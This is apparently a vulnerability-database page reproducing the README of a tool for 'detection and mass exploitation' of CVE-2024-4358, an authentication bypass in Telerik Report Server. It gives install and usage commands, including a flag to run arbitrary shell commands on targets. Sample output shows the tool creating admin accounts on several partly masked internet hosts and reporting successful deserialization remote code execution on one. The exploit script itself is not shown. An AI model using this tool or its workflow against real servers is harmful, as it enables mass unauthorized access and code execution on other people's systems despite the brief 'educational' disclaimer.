
POC details: 96b2b0f10803bd85e93d62925da7c04fca9bd352

Source
Related vulnerability
Title: Progress Software Telerik Report Server security vulnerability (CVE-2024-4358)
Description: Progress Software Telerik Report Server is an enterprise-grade report management and distribution solution from Progress Software. Progress Software Telerik Report Server 10.0.24.305 and earlier versions contain a security vulnerability: an unauthenticated attacker can reach restricted functionality through an authentication bypass.
Description
A vulnerability detection and exploitation tool for CVE-2024-4358
Introduction
# CVE-2024-4358
A vulnerability detection and mass exploitation tool for CVE-2024-4358

### Installation:
```bash
git clone https://github.com/RevoltSecurities/CVE-2024-4358
pip install -r requirements.txt
python3 exploit.py --help
```
### Usage:
```text
python3 exploit.py -h


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Description]: Vulnerability Detection and Exploitation tool for CVE-2024-4358

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     [INF]: Specify a URL or IP wtih port for vulnerability detection
  -l LIST, --list LIST  [INF]: Specify a list of URLs or IPs for vulnerability detection
  -c COMMAND, --command COMMAND
                        [INF]: Specify a shell command to execute it
  -t THREADS, --threads THREADS
                        [INF]: Number of threads for list of URLs
  -proxy PROXY, --proxy PROXY
                        [INF]: Proxy URL to send request via your proxy
  -v, --verbose         [INF]: Increases verbosity of output in console
  -o OUTPUT, --output OUTPUT
                        [INF]: Filename to save output of vulnerable target]

```

### Sample Usage:
```text
python3 exploit.py -l urls.txt -c id -t 10


    ______     ____  __         _ ______         
   / ____/  __/ __ \/ /  ____  (_)_  __/__  _____
  / __/ | |/_/ /_/ / /  / __ \/ / / / / _ \/ ___/
 / /____>  </ ____/ /__/ /_/ / / / / /  __/ /    
/_____/_/|_/_/   /_____|____/_/ /_/  \___/_/     
  
                    @RevoltSecurities

[Vulnerale]: Report for: http://13.42.129.XXX
 Login Crendentials: Usename: ozsebbQpibJbHpghuNLxutxBOl | Password: NvmpjJucmxtqhOtdFtrxfoguvQ | Authentication Token: 7CKVJAPcvFGsfIwxON6KgCy85k8xwDXoKGzV1A3KgUeB-y-DQ_F6k86XjY9KCbSjuHcaog-AJ8AApDtOkGvDw109zvjJUllJESksFmxd8ZK8r1Xdn8u-5sHX-RWmbJBEg5tDSOaQrPPNCds7RyzhEGcTiVbG0gDUfiIFgmwNWa1i8VOhhTgASDARnfPXfOfqsWqv23SrLXteuEXNymjDrC-GXWvhRHZ8a_vWhfJBSBB7aBZmXux1iq07InnAPwYC2Y12TrEG6MUPPCBHSW-vlld850MBuCktR7vjLdzahJAAdERMbAudSnetHBY4AN-221F6iIY2GjjenRiNCnJOt8gfK3I5b57d6QFy3i3a4GxnM-5AUfTGrbHrHrxP5hzpfz5bhG-xulDTyOK-g6UJJQOQBIWHIUA-QOzOufSNovv0gBnhilYBTY9ITDJSOOWSdxDVmr4U4re8xI_3InkeK8IRkIzMmTxrrnQi_J8or0hqP-7yMPCJR5gIQrOMUXPtatpVqZikho8aR3aWCcAHmoJr5yU
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://52.2.58.XX
 Login Crendentials: Usename: pjzgrOrjJXqQyFoubmrcSkHZHC | Password: ZrGVXZqIrgWkuHCgUlkHIeYPG | Authentication Token: S6q_Le5LoTqew1AmblOvZfBU5R7U0BEcBJ84UvvBf2HnUzJ_wCtstEYHqhxgEBSj7uWQ7iCCoW-_I5Z7XXpkolAN831q_NWsarTsqbm98XKP5CToJ_7lrS_1SbWCd6TJbdrBYHoSCEnRF0DMbhPzdY4TGv9P7gJQHf37jPm2lkDfC6kLyBXFopZklIwv6WrvmFw04vzLDKCWpgLP88GGqRKPJPnMNNarIUu9Mn_fV2WOei4LFWJMnmHTyLPAhK7eMLmjGmwr6jgRQp7C7PhNIpugRvUkyS8381ddVcXV8LJv2OR2yA2e2efE-Oc0
 Deserialization RCE: Failed
[Vulnerale]: Report for: http://194.233.XXX.235:83
 Login Crendentials: Usename: YmWwYloORUtOUPGuVDCbxZmuEKoIPL | Password: EPuvJTzroIfncpAHHGjJYXAKaPhQMW | Authentication Token: Ja42x9_DsL88xoSpm9xJoVIyeYEesbK2p-tZnOP-yvuiiF_DYNA6vNBeIwe8y2OcUJuOcCPtR_ODGynVtgCMmtpZxb_KRusasjNrlM2cNPKP4omDYacvcejGPycPmmd_A4Qi0ohEPG3Y4JfaU7Le3DJlMSTEoneCqcrXRqNS2JbTIXzOSXM3dSMz_0AwgHVN4H35HCkcAbedA5c-OLv_d6n9evsyHiHm15FuqbWzzqq-nTcXRiUtSYXEspCyiXE22ZlRdzClA6WDKC0-b1kFWj4Jb1yr3WULzmYHespHoRnXti_1gJoRs6Qbv2
 Report created: ELHaimYtblAxViEKIXxpdFyOXNlEHb
 Deserialization RCE: Success
Exploiter |████████████████████████████████████████| 3/3 [100%] in 7.5s (0.34/s) 
```

### INFO:
The tool was developed by [D.Sanjai Kumar @RevoltSecurities](https://www.linkedin.com/in/d-sanjai-kumar-109a7227b/) to detect and mass exploit the vulnerability CVE-2024-4358.
The tool is only for educational and ethical purposes, and the developers are not responsible for any illegal exploitation.
File snapshot

```text
[4.0K] /data/pocs/96b2b0f10803bd85e93d62925da7c04fca9bd352
├── [ 14K] exploit.py
├── [4.1K] README.md
└── [ 107] requirements.txt

0 directories, 3 files
```